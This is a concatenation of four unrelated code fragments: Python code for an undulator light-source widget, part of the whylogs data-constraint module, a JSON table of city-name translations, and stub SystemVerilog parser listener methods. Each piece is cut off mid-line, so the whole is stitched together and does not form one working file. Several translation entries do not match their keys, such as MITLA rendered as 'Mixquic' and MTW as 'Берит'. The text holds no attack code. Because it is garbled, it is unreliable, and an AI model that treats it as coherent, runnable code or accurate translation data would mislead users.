self.electron_beam_alpha_h = ax
self.electron_beam_alpha_v = ay
self.electron_beam_eta_h = ex
self.electron_beam_eta_v = ey
self.electron_beam_etap_h = 0.0
self.electron_beam_etap_v = 0.0
self.electron_beam_emittance_h = 1.3166e-10
self.electron_beam_emittance_v = 5e-12
def update_electron_beam(self):
if self.type_of_properties == 4:
self.set_ebs_electron_beam()
self.set_visible()
self.update()
def update(self):
self.update_info()
self.update_plots()
def update_info(self):
syned_light_source = self.get_light_source()
syned_electron_beam = syned_light_source.get_electron_beam()
syned_undulator = syned_light_source.get_magnetic_structure()
gamma = self.gamma()
if self.ebs_id_index == 0:
id = "<None>"
else:
id = "ID%02d %s" % (self.data_dict["straight_section"][self.ebs_id_index-1], self.data_dict["id_name"][self.ebs_id_index-1])
info_parameters = {
"electron_energy_in_GeV":self.electron_energy_in_GeV,
"gamma":"%8.3f"%self.gamma(),
"ring_current":"%4.3f "%syned_electron_beam.current(),
"K_horizontal":syned_undulator.K_horizontal(),
"K_vertical": syned_undulator.K_vertical(),
"period_length": syned_undulator.period_length(),
"number_of_periods": syned_undulator.number_of_periods(),
"undulator_length": syned_undulator.length(),
"resonance_energy":"%6.3f"%syned_undulator.resonance_energy(gamma,harmonic=1),
"resonance_energy3": "%6.3f" % syned_undulator.resonance_energy(gamma,harmonic=3),
"resonance_energy5": "%6.3f" % syned_undulator.resonance_energy(gamma,harmonic=5),
"B_horizontal":"%4.2F"%syned_undulator.magnetic_field_horizontal(),
"B_vertical": "%4.2F" % syned_undulator.magnetic_field_vertical(),
"cc_1": "%4.2f" % (1e6*syned_undulator.gaussian_central_cone_aperture(gamma,1)),
"cc_3": "%4.2f" % (1e6*syned_undulator.gaussian_central_cone_aperture(gamma,3)),
"cc_5": "%4.2f" % (1e6*syned_undulator.gaussian_central_cone_aperture(gamma,5)),
# "cc_7": "%4.2f" % (self.gaussian_central_cone_aperture(7)*1e6),
"sigma_rad": "%5.2f" % (1e6*syned_undulator.get_sigmas_radiation(gamma,harmonic=1)[0]),
"sigma_rad_prime": "%5.2f" % (1e6*syned_undulator.get_sigmas_radiation(gamma,harmonic=1)[1]),
"sigma_rad3": "%5.2f" % (1e6*syned_undulator.get_sigmas_radiation(gamma,harmonic=3)[0]),
"sigma_rad_prime3": "%5.2f" % (1e6*syned_undulator.get_sigmas_radiation(gamma,harmonic=3)[1]),
"sigma_rad5": "%5.2f" % (1e6 * syned_undulator.get_sigmas_radiation(gamma, harmonic=5)[0]),
"sigma_rad_prime5": "%5.2f" % (1e6 * syned_undulator.get_sigmas_radiation(gamma, harmonic=5)[1]),
"first_ring_1": "%5.2f" | |
import copy
import datetime
import json
import logging
import numbers
import re
from typing import Any, List, Mapping, Optional, Set, Tuple, Union
import datasketches
import jsonschema
import numpy as np
import pandas as pd
from datasketches import theta_a_not_b, update_theta_sketch
from dateutil.parser import parse
from google.protobuf.json_format import Parse
from google.protobuf.struct_pb2 import ListValue
from jsonschema import validate
from whylogs.core.statistics.hllsketch import HllSketch
from whylogs.core.statistics.numbertracker import DEFAULT_HIST_K
from whylogs.core.summaryconverters import (
compute_chi_squared_test_p_value,
compute_kl_divergence,
ks_test_compute_p_value,
single_quantile_from_sketch,
)
from whylogs.core.types import TypedDataConverter
from whylogs.proto import (
ApplyFunctionMsg,
DatasetConstraintMsg,
DatasetProperties,
InferredType,
KllFloatsSketchMessage,
MultiColumnValueConstraintMsg,
Op,
ReferenceDistributionContinuousMessage,
ReferenceDistributionDiscreteMessage,
SummaryBetweenConstraintMsg,
SummaryConstraintMsg,
SummaryConstraintMsgs,
ValueConstraintMsg,
ValueConstraintMsgs,
)
from whylogs.util.dsketch import FrequentItemsSketch
from whylogs.util.protobuf import message_to_json
TYPES = InferredType.Type
logger = logging.getLogger(__name__)
def _try_parse_strftime_format(strftime_val: str, format: str) -> Optional[datetime.datetime]:
"""
Return whether the string is in a strftime format.
:param strftime_val: str, string to check for date
:param format: format to check if strftime_val can be parsed
:return None if not parseable, otherwise the parsed datetime.datetime object
"""
parsed = None
try:
parsed = datetime.datetime.strptime(strftime_val, format)
except (ValueError, TypeError):
pass
return parsed
def _try_parse_dateutil(dateutil_val: str, ref_val=None) -> Optional[datetime.datetime]:
"""
Return whether the string can be interpreted as a date.
:param dateutil_val: str, string to check for date
:param ref_val: any, not used, interface design requirement
:return None if not parseable, otherwise the parsed datetime.datetime object
"""
parsed = None
try:
parsed = parse(dateutil_val)
except (ValueError, TypeError):
pass
return parsed
def _try_parse_json(json_string: str, ref_val=None) -> Optional[dict]:
"""
Return whether the string can be interpreted as json.
:param json_string: str, string to check for json
:param ref_val: any, not used, interface design requirement
:return None if not parseable, otherwise the parsed json object
"""
parsed = None
try:
parsed = json.loads(json_string)
except (ValueError, TypeError):
pass
return parsed
def _matches_json_schema(json_data: Union[str, dict], json_schema: Union[str, dict]) -> bool:
"""
Return whether the provided json matches the provided schema.
:param json_data: json object to check
:param json_schema: schema to check if the json object matches it
:return True if the json data matches the schema, False otherwise
"""
if isinstance(json_schema, str):
try:
json_schema = json.loads(json_schema)
except (ValueError, TypeError):
return False
if isinstance(json_data, str):
try:
json_data = json.loads(json_data)
except (ValueError, TypeError):
return False
try:
validate(instance=json_data, schema=json_schema)
except (jsonschema.exceptions.ValidationError, jsonschema.exceptions.SchemaError):
return False
return True
# restrict the set length for printing the name of the constraint which contains a reference set
MAX_SET_DISPLAY_MESSAGE_LENGTH = 20
"""
Dict indexed by constraint operator.
These help translate from constraint schema to language-specific functions that are faster to evaluate.
This is just a form of currying, and I chose to bind the boolean comparison operator first.
"""
_value_funcs = {
# functions that compare an incoming feature value to a literal value.
Op.LT: lambda x: lambda v: v < x, # assert incoming value 'v' is less than some fixed value 'x'
Op.LE: lambda x: lambda v: v <= x,
Op.EQ: lambda x: lambda v: v == x,
Op.NE: lambda x: lambda v: v != x,
Op.GE: lambda x: lambda v: v >= x,
Op.GT: lambda x: lambda v: v > x, # assert incoming value 'v' is greater than some fixed value 'x'
Op.MATCH: lambda x: lambda v: x.match(v) is not None,
Op.NOMATCH: lambda x: lambda v: x.match(v) is None,
Op.IN: lambda x: lambda v: v in x,
Op.APPLY_FUNC: lambda apply_function, reference_value: lambda v: apply_function(v, reference_value),
}
_summary_funcs1 = {
# functions that compare a summary field to a literal value.
Op.LT: lambda f, v: lambda s: getattr(s, f) < v,
Op.LE: lambda f, v: lambda s: getattr(s, f) <= v,
Op.EQ: lambda f, v: lambda s: getattr(s, f) == v,
Op.NE: lambda f, v: lambda s: getattr(s, f) != v,
Op.GE: lambda f, v: lambda s: getattr(s, f) >= v,
Op.GT: lambda f, v: lambda s: getattr(s, f) > v,
Op.BTWN: lambda f, v1, v2: lambda s: v1 <= getattr(s, f) <= v2,
Op.IN_SET: lambda f, ref_str_sketch, ref_num_sketch: lambda update_obj: round(
theta_a_not_b().compute(getattr(update_obj, f)["string_theta"], ref_str_sketch).get_estimate(), 1
)
== round(theta_a_not_b().compute(getattr(update_obj, f)["number_theta"], ref_num_sketch).get_estimate(), 1)
== 0.0,
Op.CONTAIN_SET: lambda f, ref_str_sketch, ref_num_sketch: lambda update_obj: round(
theta_a_not_b().compute(ref_str_sketch, getattr(update_obj, f)["string_theta"]).get_estimate(), 1
)
== round(theta_a_not_b().compute(ref_num_sketch, getattr(update_obj, f)["number_theta"]).get_estimate(), 1)
== 0.0,
Op.EQ_SET: lambda f, ref_str_sketch, ref_num_sketch: lambda update_obj: round(
theta_a_not_b().compute(getattr(update_obj, f)["string_theta"], ref_str_sketch).get_estimate(), 1
)
== round(theta_a_not_b().compute(getattr(update_obj, f)["number_theta"], ref_num_sketch).get_estimate(), 1)
== round(theta_a_not_b().compute(ref_str_sketch, getattr(update_obj, f)["string_theta"]).get_estimate(), 1)
== round(theta_a_not_b().compute(ref_num_sketch, getattr(update_obj, f)["number_theta"]).get_estimate(), 1)
== 0.0,
Op.IN: lambda f, v: lambda s: getattr(s, f) in v,
Op.CONTAIN: lambda f, v: lambda s: v in getattr(s, f),
}
_summary_funcs2 = {
# functions that compare two summary fields.
Op.LT: lambda f, f2: lambda s: getattr(s, f) < getattr(s, f2),
Op.LE: lambda f, f2: lambda s: getattr(s, f) <= getattr(s, f2),
Op.EQ: lambda f, f2: lambda s: getattr(s, f) == getattr(s, f2),
Op.NE: lambda f, f2: lambda s: getattr(s, f) != getattr(s, f2),
Op.GE: lambda f, f2: lambda s: getattr(s, f) >= getattr(s, f2),
Op.GT: lambda f, f2: lambda s: getattr(s, f) > getattr(s, f2),
Op.BTWN: lambda f, f2, f3: lambda s: getattr(s, f2) <= getattr(s, f) <= getattr(s, f3),
}
_multi_column_value_funcs = {
Op.LT: lambda v2: lambda v1: v1 < v2,
Op.LE: lambda v2: lambda v1: v1 <= v2,
Op.EQ: lambda v2: lambda v1: v1 == v2,
Op.NE: lambda v2: lambda v1: v1 != v2,
Op.GE: lambda v2: lambda v1: v1 >= v2,
Op.GT: lambda v2: lambda v1: v1 > v2, # assert incoming value 'v' is greater than some fixed value 'x'
Op.IN: lambda v2: lambda v1: v1 in v2,
Op.NOT_IN: lambda v2: lambda v1: v1 not in v2,
Op.SUM: lambda v: sum(v),
}
class ValueConstraint:
"""
ValueConstraints express a binary boolean relationship between an implied numeric value and a literal.
When associated with a ColumnProfile, the relation is evaluated for every incoming value that is processed by whylogs.
Parameters
----------
op : whylogs.proto.Op (required)
Enumeration of binary comparison operator applied between static value and incoming stream.
Enum values are mapped to operators like '==', '<', and '<=', etc.
value : (one-of)
When value is provided, regex_pattern must be None.
Static value to compare against incoming stream using operator specified in `op`.
regex_pattern : (one-of)
When regex_pattern is provided, value must be None.
Regex pattern to use when MATCH or NOMATCH operations are used.
apply_function:
To be supplied only when using APPLY_FUNC operation.
In case when the apply_function requires argument, to be supplied in the value param.
name : str
Name of the constraint used for reporting
verbose : bool
If true, log every application of this constraint that fails.
Useful to identify specific streaming values that fail the constraint.
"""
def __init__(self, op: Op, value=None, regex_pattern: str = None, apply_function=None, name: str = None, verbose=False):
self._name = name
self._verbose = verbose
self.op = op
self.apply_function = apply_function
self.total = 0
self.failures = 0
if (apply_function is not None) != (self.op == Op.APPLY_FUNC):
raise ValueError("A function must be provided if and only if using the APPLY_FUNC operator")
if isinstance(value, set) != (op == Op.IN):
raise ValueError("Value constraint must provide a set of values for using the IN operator!")
if self.op == Op.APPLY_FUNC:
if apply_function.__name__ not in globals() or "lambda" in apply_function.__name__:
raise ValueError("Cannot initialize constraint with APPLY_FUNC using an unknown function!")
if value is not None:
value = self.apply_func_validate(value)
self.value = value
self.func = _value_funcs[op](apply_function, value)
elif value is not None and regex_pattern is None:
# numeric value
self.value = value
self.func = _value_funcs[op](value)
elif regex_pattern is not None and value is None:
# Regex pattern
self.regex_pattern = regex_pattern
self.func = _value_funcs[op](re.compile(self.regex_pattern))
else:
raise ValueError("Value constraint must specify a numeric value or regex pattern, but not both")
@property
def name(self):
if self._name:
return self._name
if self.op == Op.APPLY_FUNC:
val_or_funct = self.apply_function.__name__
elif hasattr(self, "value"):
val_or_funct = self.value
else:
val_or_funct = self.regex_pattern
return f"value {Op.Name(self.op)} {val_or_funct}"
def update(self, v) -> bool:
self.total += 1
if self.op in [Op.MATCH, Op.NOMATCH] and not isinstance(v, str):
self.failures += 1
if self._verbose:
logger.info(f"value constraint {self.name} failed: value {v} not a string")
elif not self.func(v):
self.failures += 1
if self._verbose:
logger.info(f"value constraint {self.name} failed on value {v}")
def apply_func_validate(self, value) -> str:
if not isinstance(value, str):
if self.apply_function == _matches_json_schema:
try:
value = json.dumps(value)
except (ValueError, TypeError):
raise | |
"ja_JP": "メルサ",
"ko_KR": "메르사",
"pl_PL": "Mersa",
"pt_BR": "Mersa",
"ru_RU": "Мэрса"
},
"MESEMBRIA": {
"de_DE": "Mesembria",
"es_ES": "Mesembria",
"fr_FR": "Mésembria",
"it_IT": "Mesembria",
"ja_JP": "メセンブリア",
"ko_KR": "메셈브리아",
"pl_PL": "Mesembria",
"pt_BR": "Mesembria",
"ru_RU": "Месембрия"
},
"METHONE": {
"de_DE": "Methone",
"es_ES": "Methone",
"fr_FR": "Methone",
"it_IT": "Methone",
"ja_JP": "メトニ ",
"ko_KR": "메토네",
"pl_PL": "Methone",
"pt_BR": "Modone",
"ru_RU": "Метони"
},
"METZ": {
"de_DE": "Metz",
"es_ES": "Metz",
"fr_FR": "Metz",
"it_IT": "Metz",
"ja_JP": "メッツ",
"ko_KR": "메스",
"pl_PL": "Metz",
"pt_BR": "Metz",
"ru_RU": "Мец"
},
"MEXICO_CITY": {
"de_DE": "Mexico City",
"es_ES": "Ciudad de México",
"fr_FR": "Mexico",
"it_IT": "Città del Messico",
"ja_JP": "メキシコシティ",
"ko_KR": "멕시코시티",
"pl_PL": "Meksyk",
"pt_BR": "Cidade do México",
"ru_RU": "Мехико"
},
"MHLAHLANDLELA": {
"de_DE": "Mhlahlandlela",
"es_ES": "Mhlahlandlela",
"fr_FR": "Mhlahlandlela",
"it_IT": "Mhlahlandlela",
"ja_JP": "ムフラフランドレラ",
"ko_KR": "음라란들레라",
"pl_PL": "Mhlahlandlela",
"pt_BR": "Mhlahlandlela",
"ru_RU": "Млаландлела"
},
"MIAM": {
"de_DE": "Miam",
"es_ES": "Miam",
"fr_FR": "Miam",
"it_IT": "Miam",
"ja_JP": "ミアム",
"ko_KR": "미암",
"pl_PL": "Miam",
"pt_BR": "Miam",
"ru_RU": "Миам"
},
"MIAMI": {
"de_DE": "Miami",
"es_ES": "Miami",
"fr_FR": "Miami",
"it_IT": "Miami",
"ja_JP": "マイアミ",
"ko_KR": "마이애미",
"pl_PL": "Miami",
"pt_BR": "Miami",
"ru_RU": "Майями"
},
"MIDDELBURG": {
"de_DE": "Middelburg",
"es_ES": "Middelburg",
"fr_FR": "Middelburg",
"it_IT": "Middelburg",
"ja_JP": "ミデルブルフ",
"ko_KR": "미델뷔르흐",
"pl_PL": "Middelburg",
"pt_BR": "Midelburgo",
"ru_RU": "Мидделбург"
},
"MIKISIW_WACIHK": {
"de_DE": "Mikisiwacîhk",
"es_ES": "Mikisiw-Wacîhk",
"fr_FR": "Mikisiw-Wacîhk",
"it_IT": "Mikisiw-Wacîhk",
"ja_JP": "ミキシウ・ワチク",
"ko_KR": "미키시우와치크",
"pl_PL": "Mikisiw-Wacîhk",
"pt_BR": "Mikisiw-Wacîhk",
"ru_RU": "Микисив-Вацик"
},
"MILETOS": {
"de_DE": "Milet",
"es_ES": "Mileto",
"fr_FR": "Milet",
"it_IT": "Mileto",
"ja_JP": "ミレトス",
"ko_KR": "밀레토스",
"pl_PL": "Mileto",
"pt_BR": "Miletos",
"ru_RU": "Милет"
},
"MINNEAPOLIS": {
"de_DE": "Minneapolis",
"es_ES": "Minneapolis",
"fr_FR": "Minneapolis",
"it_IT": "Minneapolis",
"ja_JP": "ミネアポリス",
"ko_KR": "미니애폴리스",
"pl_PL": "Minneapolis",
"pt_BR": "Minneapolis",
"ru_RU": "Миннеаполис"
},
"MIRANDA_DO_DOURO": {
"de_DE": "Miranda do Douro",
"es_ES": "Miranda do Douro",
"fr_FR": "Miranda do Douro",
"it_IT": "Miranda do Douro",
"ja_JP": "ミランダ・ド・ドウロ",
"ko_KR": "미란다도도우로",
"pl_PL": "Miranda do Douro",
"pt_BR": "Miranda do Douro",
"ru_RU": "Миранда-ду-Дору"
},
"MISKOLC": {
"de_DE": "Miskolc",
"es_ES": "Miskolc",
"fr_FR": "Miskolc",
"it_IT": "Miskolc",
"ja_JP": "ミシュコルツ",
"ko_KR": "미슈콜츠",
"pl_PL": "Miszkolc",
"pt_BR": "Miskolc",
"ru_RU": "Мишкольц"
},
"MISSANABIE": {
"de_DE": "Missanabie",
"es_ES": "Missanabie",
"fr_FR": "Missanabie",
"it_IT": "Missanabie",
"ja_JP": "ミッサナビー",
"ko_KR": "미사나비",
"pl_PL": "Missanabie",
"pt_BR": "Missanabie",
"ru_RU": "Миссанаби"
},
"MISSISSAUGA": {
"de_DE": "Mississauga",
"es_ES": "Mississauga",
"fr_FR": "Mississauga",
"it_IT": "Mississauga",
"ja_JP": "ミシサガ",
"ko_KR": "미시소거",
"pl_PL": "Mississauga",
"pt_BR": "Mississauga",
"ru_RU": "Миссиссога"
},
"MISTAHI_SIPIHK": {
"de_DE": "Mistahi-Sipihk",
"es_ES": "Mistahi-Sipihk",
"fr_FR": "Mistahi-Sipihk",
"it_IT": "Mistahi-Sipihk",
"ja_JP": "ミスタヒ・シピク",
"ko_KR": "미스타히스피크",
"pl_PL": "Mistahi-Sipihk",
"pt_BR": "Mistahi-Sipihk",
"ru_RU": "Мистахи-Сипик"
},
"MISTAWASIS": {
"de_DE": "Mistawasis",
"es_ES": "Mistawasis",
"fr_FR": "Mistawasis",
"it_IT": "Mistawasis",
"ja_JP": "ミスタワシス",
"ko_KR": "미스타와시스",
"pl_PL": "Mistawasis",
"pt_BR": "Mistawasis",
"ru_RU": "Миставасис"
},
"MITLA": {
"de_DE": "Mixquic",
"es_ES": "Mixquic",
"fr_FR": "Mixquic",
"it_IT": "Mixquic",
"ja_JP": "ミスキック",
"ko_KR": "믹스퀴크",
"pl_PL": "Mixquic",
"pt_BR": "Mixquic",
"ru_RU": "Миккик"
},
"MLAMBONGWENYA": {
"de_DE": "Mlambongwenya",
"es_ES": "Mlambongwenya",
"fr_FR": "Mlambongwenya",
"it_IT": "Mlambongwenya",
"ja_JP": "ムラムボングウェニア",
"ko_KR": "음람봉궨야",
"pl_PL": "Mlambongwenya",
"pt_BR": "Mlambongwenya",
"ru_RU": "Мламбонгвенья"
},
"MOCHA": {
"de_DE": "Mokka",
"es_ES": "Moca",
"fr_FR": "Mocha",
"it_IT": "Mocha",
"ja_JP": "モカ",
"ko_KR": "모카",
"pl_PL": "Mokka",
"pt_BR": "Moca",
"ru_RU": "Моха"
},
"MOHACS": {
"de_DE": "Mohács",
"es_ES": "Mohács",
"fr_FR": "Mohács",
"it_IT": "Mohács",
"ja_JP": "モハーチ",
"ko_KR": "모하치",
"pl_PL": "Mohacz",
"pt_BR": "Mohács",
"ru_RU": "Мохач"
},
"MOHENJO_DARO": {
"de_DE": "Mohenjo-Daro",
"es_ES": "Mohenjo-Daro",
"fr_FR": "Mohenjo-daro",
"it_IT": "Mohenjo-Daro",
"ja_JP": "モヘンジョ・ダロ",
"ko_KR": "모헨조다로",
"pl_PL": "Mohendżo-Daro",
"pt_BR": "Mohenjo-Daro",
"ru_RU": "Мохенджо-Даро"
},
"MOHENJO_DARO_1": {
"de_DE": "Mohenjo-Daro",
"es_ES": "Mohenjo-Daro",
"fr_FR": "Mohenjo-daro",
"it_IT": "Mohenjo-Daro",
"ja_JP": "モヘンジョ・ダロ",
"ko_KR": "모헨조다로",
"pl_PL": "Mohendżo-Daro",
"pt_BR": "Mohenjo-Daro",
"ru_RU": "Мохенджо-Даро"
},
"MOKPO": {
"de_DE": "Mokpo",
"es_ES": "Mokpo",
"fr_FR": "Mokpo",
"it_IT": "Mokpo",
"ja_JP": "木浦",
"ko_KR": "목포",
"pl_PL": "Mokpo",
"pt_BR": "Mokpo",
"ru_RU": "Мокпхо"
},
"MOLU_MAPU": {
"de_DE": "Molu Mapu",
"es_ES": "Molu Mapu",
"fr_FR": "Molu Mapu",
"it_IT": "Molu Mapu",
"ja_JP": "モル・マプ",
"ko_KR": "몰루 마푸",
"pl_PL": "Molu Mapu",
"pt_BR": "Molu Mapu",
"ru_RU": "Молу-Мапу"
},
"MOMPOS": {
"de_DE": "Mompós",
"es_ES": "Mompós",
"fr_FR": "Mompós",
"it_IT": "Mompós",
"ja_JP": "モンポス",
"ko_KR": "몸포스",
"pl_PL": "Mompós",
"pt_BR": "Mompós",
"ru_RU": "Момпос"
},
"MONASTIR": {
"de_DE": "Monastır",
"es_ES": "Monastir",
"fr_FR": "Monastir",
"it_IT": "Munastır",
"ja_JP": "モナスティル",
"ko_KR": "모나스티르",
"pl_PL": "Monastyr",
"pt_BR": "Monastir",
"ru_RU": "Монастир"
},
"MONCTON": {
"de_DE": "Moncton",
"es_ES": "Moncton",
"fr_FR": "Moncton",
"it_IT": "Moncton",
"ja_JP": "モンクトン",
"ko_KR": "멍크턴",
"pl_PL": "Moncton",
"pt_BR": "Moncton",
"ru_RU": "Монктон"
},
"MONS": {
"de_DE": "Mons",
"es_ES": "Mons",
"fr_FR": "Mons",
"it_IT": "Mons",
"ja_JP": "モンス",
"ko_KR": "몽스",
"pl_PL": "Mons",
"pt_BR": "Mons",
"ru_RU": "Монс"
},
"MONTELIMAR": {
"de_DE": "Montélimar",
"es_ES": "Montélimar",
"fr_FR": "Montélimar",
"it_IT": "Montélimar",
"ja_JP": "モンテリマール",
"ko_KR": "몽텔리마르",
"pl_PL": "Montélimar",
"pt_BR": "Montélimar",
"ru_RU": "Монтелимар"
},
"MONTPELLIER": {
"de_DE": "Montpellier",
"es_ES": "Montpellier",
"fr_FR": "Montpellier",
"it_IT": "Montpellier",
"ja_JP": "モンペリエ",
"ko_KR": "몽펠리에",
"pl_PL": "Montpellier",
"pt_BR": "Montpellier",
"ru_RU": "Монпелье"
},
"MONTREAL": {
"de_DE": "Montréal",
"es_ES": "Montréal",
"fr_FR": "Montréal",
"it_IT": "Montréal",
"ja_JP": "モントリオール",
"ko_KR": "몬트리올",
"pl_PL": "Montreal",
"pt_BR": "Montreal",
"ru_RU": "Монреаль"
},
"MONTROSE": {
"de_DE": "Montrose",
"es_ES": "Montrose",
"fr_FR": "Montrose",
"it_IT": "Montrose",
"ja_JP": "モントローズ",
"ko_KR": "몬트로즈",
"pl_PL": "Montrose",
"pt_BR": "Montrose",
"ru_RU": "Монтроуз"
},
"MONTSERRAT": {
"de_DE": "Montserrat",
"es_ES": "Montserrat",
"fr_FR": "Montserrat",
"it_IT": "Montserrat",
"ja_JP": "モントセラト",
"ko_KR": "몬세라트",
"pl_PL": "Montserrat",
"pt_BR": "Montserrat",
"ru_RU": "Монтсеррат"
},
"MOOSOMIN": {
"de_DE": "Moosomin",
"es_ES": "Moosomin",
"fr_FR": "Moosomin",
"it_IT": "Moosomin",
"ja_JP": "ムーソミン",
"ko_KR": "무소민",
"pl_PL": "Moosomin",
"pt_BR": "Moosomin",
"ru_RU": "Мусомин"
},
"MOPTI": {
"de_DE": "Mopti",
"es_ES": "Mopti",
"fr_FR": "Mopti",
"it_IT": "Mopti",
"ja_JP": "モプティ",
"ko_KR": "몹티",
"pl_PL": "Mopti",
"pt_BR": "Mopti",
"ru_RU": "Мопти"
},
"MORIOKA": {
"de_DE": "Morioka",
"es_ES": "Morioka",
"fr_FR": "Morioka",
"it_IT": "Morioka",
"ja_JP": "盛岡",
"ko_KR": "모리오카",
"pl_PL": "Morioka",
"pt_BR": "Morioka",
"ru_RU": "Мориока"
},
"MORON": {
"de_DE": "Mörön",
"es_ES": "Mörön",
"fr_FR": "Mörön",
"it_IT": "Mörön",
"ja_JP": "ムルン",
"ko_KR": "므릉",
"pl_PL": "Mörön",
"pt_BR": "Mörön",
"ru_RU": "Мурэн"
},
"MOSCOW": {
"de_DE": "Moskau",
"es_ES": "Moscú",
"fr_FR": "Moscou",
"it_IT": "Mosca",
"ja_JP": "モスクワ",
"ko_KR": "모스크바",
"pl_PL": "Moskwa",
"pt_BR": "Moscou",
"ru_RU": "Москва"
},
"MOSTER": {
"de_DE": "Moster",
"es_ES": "Moster",
"fr_FR": "Mostar",
"it_IT": "Moster",
"ja_JP": "モスター",
"ko_KR": "모스테르",
"pl_PL": "Moster",
"pt_BR": "Moster",
"ru_RU": "Мостер"
},
"MOTAKIORA": {
"de_DE": "Motakiora",
"es_ES": "Motakiora",
"fr_FR": "Motakiora",
"it_IT": "Motakiora",
"ja_JP": "モタキオラ",
"ko_KR": "모타키오라",
"pl_PL": "Motakiora",
"pt_BR": "Motakiora",
"ru_RU": "Мотакиора"
},
"MOTUPOHUE": {
"de_DE": "Motupōhue",
"es_ES": "Motupōhue",
"fr_FR": "Motupōhue",
"it_IT": "Motupōhue",
"ja_JP": "モトゥポフエ",
"ko_KR": "모투포후에",
"pl_PL": "Motupōhue",
"pt_BR": "Motupōhue",
"ru_RU": "Мотупоху"
},
"MOUNT_ATHOS": {
"de_DE": "Berg Athos",
"es_ES": "Monte Athos",
"fr_FR": "Athos",
"it_IT": "Monte Athos",
"ja_JP": "アトス山",
"ko_KR": "아토스산",
"pl_PL": "Athos",
"pt_BR": "Monte Atos",
"ru_RU": "Афон"
},
"MPINDA": {
"de_DE": "Mpinda",
"es_ES": "Mpinda",
"fr_FR": "Mpinda",
"it_IT": "Mpinda",
"ja_JP": "ムピンダ",
"ko_KR": "음판다",
"pl_PL": "Mpinda",
"pt_BR": "Mpinda",
"ru_RU": "Мпинда"
},
"MTHATHA": {
"de_DE": "Mthatha",
"es_ES": "Mthatha",
"fr_FR": "Mthatha",
"it_IT": "Mthatha",
"ja_JP": "ウムタタ",
"ko_KR": "음타타",
"pl_PL": "Mthatha",
"pt_BR": "Mthatha",
"ru_RU": "Мтата"
},
"MTHONJANENI": {
"de_DE": "Mthonjaneni",
"es_ES": "Mthonjaneni",
"fr_FR": "Mthonjaneni",
"it_IT": "Mthonjaneni",
"ja_JP": "ムソンジャネニ",
"ko_KR": "음톤자네니",
"pl_PL": "Mthonjaneni",
"pt_BR": "Mthonjaneni",
"ru_RU": "Мтонджанени"
},
"MTSKHETA": {
"de_DE": "Mzcheta",
"es_ES": "Mtskheta",
"fr_FR": "Mtskheta",
"it_IT": "Mtskheta",
"ja_JP": "ムツヘタ",
"ko_KR": "음츠케타",
"pl_PL": "Mccheta",
"pt_BR": "Mtscheta",
"ru_RU": "Мцхета"
},
"MTUBATUBA": {
"de_DE": "Mtubatuba",
"es_ES": "Mtubatuba",
"fr_FR": "Mtubatuba",
"it_IT": "Mtubatuba",
"ja_JP": "ムトゥバトゥバ",
"ko_KR": "음투바투바",
"pl_PL": "Mtubatuba",
"pt_BR": "Mtubatuba",
"ru_RU": "Мтубатуба"
},
"MTUNZINI": {
"de_DE": "Mtunzini",
"es_ES": "Mtunzini",
"fr_FR": "Mtunzini",
"it_IT": "Mtunzini",
"ja_JP": "ムツンジニ",
"ko_KR": "음툰지니",
"pl_PL": "Mtunzini",
"pt_BR": "Mtunzini",
"ru_RU": "Мтунзини"
},
"MTW": {
"de_DE": "Mtw",
"es_ES": "Mtw",
"fr_FR": "Mtw",
"it_IT": "Mtw",
"ja_JP": "ムトゥウ",
"ko_KR": "모티아",
"pl_PL": "Mtw",
"pt_BR": "Mtw",
"ru_RU": "Берит"
},
"MUANG_TAM": {
"de_DE": "Muang Tam",
"es_ES": "Muang Tam",
"fr_FR": "Muang Tam",
"it_IT": "Muang Tam",
"ja_JP": "ムアン・タム",
"ko_KR": "무앙 탐",
"pl_PL": "Muang Tam",
"pt_BR": "Muang Tam",
"ru_RU": "Муанг Там"
},
"MULUMBI": {
"de_DE": "Mulumbi",
"es_ES": "Mulumbi",
"fr_FR": "Mulumbi",
"it_IT": "Mulumbi",
"ja_JP": "ムルンビ",
"ko_KR": "뮬움비",
"pl_PL": "Mulumbi",
"pt_BR": "Mulumbi",
"ru_RU": "Мулумби"
},
"MUMBAI": {
"de_DE": "Mumbai",
"es_ES": "Bombay",
"fr_FR": "Bombay ",
"it_IT": "Mumbai",
"ja_JP": "ムンバイ",
"ko_KR": "뭄바이",
"pl_PL": "Bombaj",
"pt_BR": "Mumbai",
"ru_RU": "Мумбаи"
},
"MUNICH": {
"de_DE": "München",
"es_ES": "Múnich",
"fr_FR": "Munich",
"it_IT": "Monaco",
"ja_JP": "ミュンヘン",
"ko_KR": "뮌헨",
"pl_PL": "Monachium",
"pt_BR": "Munique",
"ru_RU": "Мюнхен"
},
"MUNSTER": {
"de_DE": "Münster",
"es_ES": "Münster",
"fr_FR": "Münster",
"it_IT": "Münster",
"ja_JP": "ミュンスター",
"ko_KR": "먼스터",
"pl_PL": "Munster",
"pt_BR": "Münster",
"ru_RU": "Мюнстер"
},
"MURCIA": {
"de_DE": "Murcia",
"es_ES": "Murcia",
"fr_FR": "Murcie",
"it_IT": "Murcia",
"ja_JP": "ムルシア",
"ko_KR": "무르시아",
"pl_PL": "Murcia",
"pt_BR": "Murcia",
"ru_RU": "Мурсия"
},
"MUSAWWARAT_ES_SUFRA": {
"de_DE": "Musawwarat es-Sufra",
"es_ES": "Musawwarat es-Sufra",
"fr_FR": "Musawwarat es-Sufra",
"it_IT": "Musawwarat es-Sufra",
"ja_JP": "ムサワラット・エス・スフラ",
"ko_KR": "무사와라 에 수프라",
"pl_PL": "Al-Musawwarat as-Safra",
"pt_BR": "Musawwarat es-Sufra",
"ru_RU": "Мусавварат-эс-Суфра"
},
"MUSCAT": {
"de_DE": "Maskat",
"es_ES": "Mascate",
"fr_FR": "Mascate",
"it_IT": "Mascate",
"ja_JP": "マスカット",
"ko_KR": "무스카트",
"pl_PL": "Maskat",
"pt_BR": "Mascate",
"ru_RU": "Маскат"
},
"MUTSO": {
"de_DE": | |
# Enter a parse tree produced by SystemVerilogParser#list_of_cross_items.
def enterList_of_cross_items(self, ctx:SystemVerilogParser.List_of_cross_itemsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_cross_items.
def exitList_of_cross_items(self, ctx:SystemVerilogParser.List_of_cross_itemsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cross_item.
def enterCross_item(self, ctx:SystemVerilogParser.Cross_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cross_item.
def exitCross_item(self, ctx:SystemVerilogParser.Cross_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cross_body.
def enterCross_body(self, ctx:SystemVerilogParser.Cross_bodyContext):
pass
